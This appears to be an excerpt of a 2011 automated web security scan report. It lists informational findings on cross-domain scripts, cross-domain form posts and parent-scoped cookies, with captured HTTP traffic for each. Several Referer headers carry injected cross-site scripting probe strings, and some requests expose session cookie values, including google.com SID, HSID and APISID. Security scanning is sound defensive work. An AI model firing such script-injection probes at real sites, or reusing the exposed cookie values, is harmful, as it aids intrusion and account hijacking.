document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /sites/all/modules/custom/pajito/widget/content/widget.js.php

Request 1

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:21 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web8.b.examiner.com
Content-Length: 4694

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.nowpublic.com%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop.call(data, p)) {
message.push(esc(p) + '=' +
...[SNIP]...

Request 2

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web10.b.examiner.com
Content-Length: 4751

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.examiner.com%2Fsites%2Fall%2Fmodules%2Fcustom%2Fpajito%2Fwidget%2Fhost%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop
...[SNIP]...

9. Cross-domain POST
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://savannahnow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.3. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain popularscience.bonniersubscriptions.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</div>
<form action="https://popularscience.bonniersubscriptions.com/HAG0-005/" method="post">
<div id="fields">
...[SNIP]...

10. Cookie scoped to parent domain
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

10.2. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.3. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


10.4. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

10.5. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.6. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
